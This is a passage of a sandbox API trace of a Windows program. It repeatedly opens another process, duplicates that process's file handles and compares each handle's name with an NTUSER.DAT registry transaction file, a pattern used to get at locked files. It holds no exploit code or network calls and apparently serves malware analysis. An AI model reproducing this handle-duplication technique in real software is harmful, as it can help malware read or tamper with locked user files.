lpExitCode=0x32ee30) returned 1 [0164.734] CloseHandle (hObject=0x1e4) returned 1 [0164.734] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.734] CloseHandle (hObject=0x194) returned 1 [0164.734] CloseHandle (hObject=0x1e8) returned 1 [0164.734] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.734] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x950, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.735] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.736] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.736] CloseHandle (hObject=0x1e4) returned 1 [0164.736] CloseHandle (hObject=0x194) returned 1 [0164.736] CloseHandle (hObject=0x1e8) returned 1 [0164.736] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.736] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x984, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.737] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.738] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.738] CloseHandle (hObject=0x1e4) returned 1 [0164.738] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -3 [0164.738] CloseHandle (hObject=0x194) returned 1 [0164.738] CloseHandle (hObject=0x1e8) returned 1 [0164.738] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.738] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x9f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.739] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.740] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.740] CloseHandle (hObject=0x1e4) returned 1 [0164.740] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.740] CloseHandle (hObject=0x194) returned 1 [0164.741] CloseHandle (hObject=0x1e8) returned 1 [0164.741] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.741] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa20, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.741] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.742] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.742] CloseHandle (hObject=0x1e4) returned 1 [0164.742] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.742] CloseHandle (hObject=0x194) returned 1 [0164.742] CloseHandle (hObject=0x1e8) returned 1 [0164.742] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.743] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa34, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.743] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.744] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.744] CloseHandle (hObject=0x1e4) returned 1 [0164.745] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.745] CloseHandle (hObject=0x194) returned 1 [0164.745] CloseHandle (hObject=0x1e8) returned 1 [0164.745] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.745] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.745] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.745] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.746] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.746] CloseHandle (hObject=0x1e4) returned 1 [0164.747] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.747] CloseHandle (hObject=0x194) returned 1 [0164.747] CloseHandle (hObject=0x1e8) returned 1 [0164.747] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.747] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.748] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.748] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.749] CloseHandle (hObject=0x1e4) returned 1 [0164.749] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.749] CloseHandle (hObject=0x194) returned 1 [0164.749] CloseHandle (hObject=0x1e8) returned 1 [0164.749] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.749] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.749] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.750] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.750] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.750] CloseHandle (hObject=0x1e4) returned 1 [0164.751] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -8 [0164.751] CloseHandle (hObject=0x194) returned 1 [0164.751] CloseHandle (hObject=0x1e8) returned 1 [0164.751] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.751] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.751] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.752] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.753] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.753] CloseHandle (hObject=0x1e4) returned 1 [0164.753] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.753] CloseHandle (hObject=0x194) returned 1 [0164.753] CloseHandle (hObject=0x1e8) returned 1 [0164.753] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.753] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x121c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.753] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.754] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.755] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.755] CloseHandle (hObject=0x1e4) returned 1 [0164.755] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.755] CloseHandle (hObject=0x194) returned 1 [0164.755] CloseHandle (hObject=0x1e8) returned 1 [0164.755] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.755] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.755] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.755] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.756] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.756] CloseHandle (hObject=0x1e4) returned 1 [0164.756] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -13 [0164.756] CloseHandle (hObject=0x194) returned 1 [0164.757] CloseHandle (hObject=0x1e8) returned 1 [0164.757] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.757] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1234, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.757] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.757] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.758] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.758] CloseHandle (hObject=0x1e4) returned 1 [0164.758] CloseHandle (hObject=0x194) returned 1 [0164.758] CloseHandle (hObject=0x1e8) returned 1 [0164.758] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.758] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.759] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.760] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.760] CloseHandle (hObject=0x1e4) returned 1 [0164.760] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.760] CloseHandle (hObject=0x194) returned 1 [0164.760] CloseHandle (hObject=0x1e8) returned 1 [0164.760] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.760] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.761] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.762] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.762] CloseHandle (hObject=0x1e4) returned 1 [0164.762] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.762] CloseHandle (hObject=0x194) returned 1 [0164.762] CloseHandle (hObject=0x1e8) returned 1 [0164.762] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.762] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.763] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.764] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.764] CloseHandle (hObject=0x1e4) returned 1 [0164.764] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.764] CloseHandle (hObject=0x194) returned 1 [0164.764] CloseHandle (hObject=0x1e8) returned 1 [0164.764] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.764] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.764] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.765] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.766] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.766] CloseHandle (hObject=0x1e4) returned 1 [0164.766] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.766] CloseHandle (hObject=0x194) returned 1 [0164.766] CloseHandle (hObject=0x1e8) returned 1 [0164.766] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.766] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.766] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.767] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.768] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.768] CloseHandle (hObject=0x1e4) returned 1 [0164.768] _wcsicmp (_Str1="\\thumbcache_32.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.768] CloseHandle (hObject=0x194) returned 1 [0164.768] CloseHandle (hObject=0x1e8) returned 1 [0164.768] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.768] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.768] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.769] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.770] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.770] CloseHandle (hObject=0x1e4) returned 1 [0164.770] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 6 [0164.770] CloseHandle (hObject=0x194) returned 1 [0164.770] CloseHandle (hObject=0x1e8) returned 1 [0164.770] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.770] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x137c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.771] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.772] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.772] CloseHandle (hObject=0x1e4) returned 1 [0164.772] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.772] CloseHandle (hObject=0x194) returned 1 [0164.772] CloseHandle (hObject=0x1e8) returned 1 [0164.772] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.772] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1388, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.773] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.773] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.774] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.774] CloseHandle (hObject=0x1e4) returned 1 [0164.774] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.774] CloseHandle (hObject=0x194) returned 1 [0164.775] CloseHandle (hObject=0x1e8) returned 1 [0164.775] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.775] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.775] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.776] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.776] CloseHandle (hObject=0x1e4) returned 1 [0164.776] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.776] CloseHandle (hObject=0x194) returned 1 [0164.776] CloseHandle (hObject=0x1e8) returned 1 [0164.776] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0164.776] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x13a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.776] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.777] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.778] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.778] CloseHandle (hObject=0x1e4) returned 1 [0164.778] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0164.778] CloseHandle (hObject=0x194) returned 1 [0164.778] CloseHandle (hObject=0x1e8) returned 1 [0164.778] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0164.778] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.779] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.779] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.780] CloseHandle (hObject=0x1e4) returned 1 [0164.780] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.780] CloseHandle (hObject=0x194) returned 1 [0164.780] CloseHandle (hObject=0x1e8) returned 1 [0164.780] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0164.780] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.781] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.782] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.782] CloseHandle (hObject=0x1e4) returned 1 [0164.782] CloseHandle (hObject=0x194) returned 1 [0164.782] CloseHandle (hObject=0x1e8) returned 1 [0164.782] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x1e8 [0164.782] DuplicateHandle (in: 